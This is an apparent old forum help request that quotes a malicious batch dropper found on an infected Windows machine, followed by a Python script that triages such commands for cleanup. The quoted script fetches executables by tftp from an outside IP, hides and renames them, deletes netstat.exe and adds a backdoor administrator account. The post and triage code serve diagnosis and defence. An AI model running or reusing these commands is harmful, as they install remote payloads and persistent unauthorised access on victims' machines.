Sed Mayne
Hi all
During my paranoia over the MSBlaster invasion, I found a file called
"inst.bat" in my Windows\System32 directory. Its contents are listed
below (I added the "## "). It had obviously run because the exe files
in the tftp lines were also there. I deleted the exe files. Has anyone
seen this? What does it do and how can I undo it? Ever since I found
this my internet access has been slow (I think?)
Regards
Sed Mayne
## echo off
## echo created by iM
## echo versiob 1.0
##
## tftp -i 66.163.242.178 GET kaiten.exe
## tftp -i 66.163.242.178 GET serv.exe
## tftp -i 66.163.242.178 GET ats.exe
## tftp -i 66.163.242.178 GET srvss.exe
##
## mkdir %SystemRoot%\System32\dllcache
## attrib +a +h +s %SystemRoot%\System32\dllcache
##
## copy kaiten.exe %SystemRoot%\System32\dllcache\Explorer.exe
## echo copied.
## echo copying services
## copy serv.exe %SystemRoot%\System32\dllcache\serv.exe
## copy ats.exe %SystemRoot%\System32\dllcache\ats.exe
## copy srvss.exe %SystemRoot%\System32\dllcache\srvss.exe
## del %SystemRoot%\System32\netstat.exe
## echo now adding user sysadmin/pimp
## net user sysadmin /add
## net user sysadmin pimp
## net localgroup Administrators sysadmin /add
## cd %SystemRoot%\System32\dllcache
## set MXBIN=%SystemRoot%\System32\dllcache
## set MXHOME=%SystemRoot%\System32\dllcache
## serv.exe createsvrany "Explorer" "Windows GUI Manager"
## "%SystemRoot%\System32\dllcache\srvss.exe"
## "%SystemRoot%\System32\dllcache\Explorer.exe"
##
## net start Explorer
##
## echo Disconnecting from remote boxes..
## echo Process Finished. Hit any Key to exit.
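
A static triage pass over a script like the one quoted above, as an added example that is not part of the original post: it sorts each command into the change it makes to the host so every change can be checked and reverted. The function names and the sample lines are constructed for illustration, and the sample uses a documentation-range address.

```python
import re

# Constructed sample in the style of the quoted inst.bat; the address is
# from the 192.0.2.0/24 documentation range, not the one in the post.
SAMPLE = r'''## echo off
## tftp -i 192.0.2.10 GET kaiten.exe
## attrib +a +h +s %SystemRoot%\System32\dllcache
## copy kaiten.exe %SystemRoot%\System32\dllcache\Explorer.exe
## del %SystemRoot%\System32\netstat.exe
## net user sysadmin /add
## net localgroup Administrators sysadmin /add
## net start Explorer
'''

# (finding name, pattern); the first matching rule wins for each line.
RULES = [
    ("download", re.compile(r"tftp\s+-i\s+(\S+)\s+get\s+(\S+)", re.I)),
    ("hidden_dir", re.compile(r"attrib\s+(?:\+\w\s+)*\+h\s+(?:\+\w\s+)*(\S+)", re.I)),
    ("copied_file", re.compile(r"copy\s+(\S+)\s+(\S+)", re.I)),
    ("deleted_file", re.compile(r"del\s+(\S+)", re.I)),
    ("new_account", re.compile(r"net\s+user\s+(\S+)\s+/add", re.I)),
    ("admin_grant", re.compile(r"net\s+localgroup\s+(\S+)\s+(\S+)\s+/add", re.I)),
    ("service_start", re.compile(r"net\s+start\s+(\S+)", re.I)),
]

def triage(script_text):
    """Group the host changes a batch script makes, keyed by finding name."""
    findings = {name: [] for name, _ in RULES}
    for raw in script_text.splitlines():
        line = re.sub(r"^\s*(?:##\s?)?", "", raw).strip()  # drop the poster's "## "
        for name, rx in RULES:
            m = rx.match(line)
            if m:
                groups = m.groups()
                findings[name].append(groups[0] if len(groups) == 1 else groups)
                break
    return findings

def renamed_copies(findings):
    """Copies whose destination name differs from the source (masquerading)."""
    def base(path):
        return path.rsplit("\\", 1)[-1].lower()
    return [(s, d) for s, d in findings["copied_file"] if base(s) != base(d)]

if __name__ == "__main__":
    result = triage(SAMPLE)
    for name, hits in result.items():
        print(f"{name}: {hits}")
    print("renamed on copy:", renamed_copies(result))
```

Each finding corresponds to something to verify on the host: the added account and its group membership, the started service, the hidden directory's contents, and the deleted tool.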